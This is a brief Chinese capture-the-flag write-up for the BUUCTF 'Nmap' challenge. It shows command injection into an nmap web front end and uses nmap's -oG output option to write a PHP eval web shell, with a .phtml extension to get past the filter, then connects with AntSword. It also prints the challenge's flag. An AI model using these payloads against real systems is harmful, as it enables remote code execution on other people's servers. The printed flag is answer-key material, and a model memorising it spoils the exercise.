BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
FIN66683 小时前
新天力:食品容器安全与创新的领航者
科技·安全·产品运营·创业创新·制造
alex1003 小时前
BeaverTails数据集:大模型安全对齐的关键资源与实战应用
人工智能·算法·安全
鹿鸣天涯3 小时前
Kali Linux 2025.3 正式发布:更贴近前沿的安全平台
linux·运维·安全
鸠摩智首席音效师3 小时前
如何在 Apache 中启用 HSTS 以增强网络安全性 ?
网络·apache
!chen3 小时前
Harbor磁盘空间清理指南:如何安全清理半年前的镜像
安全
alex1003 小时前
Context Compliance Attack:大模型安全的新兴威胁与防御策略
网络·安全·web安全
xiejava10186 小时前
开源安全管理平台wazuh-安装与配置
安全·开源
追逐梦想的小孩7 小时前
从零开始学华为:Console口连接设备
网络·华为·交换机
Boilermaker19927 小时前
【Java】网络编程(5)
网络
粟悟饭&龟波功8 小时前
【网络安全】三、入门篇:Web安全常见漏洞概述
安全·web安全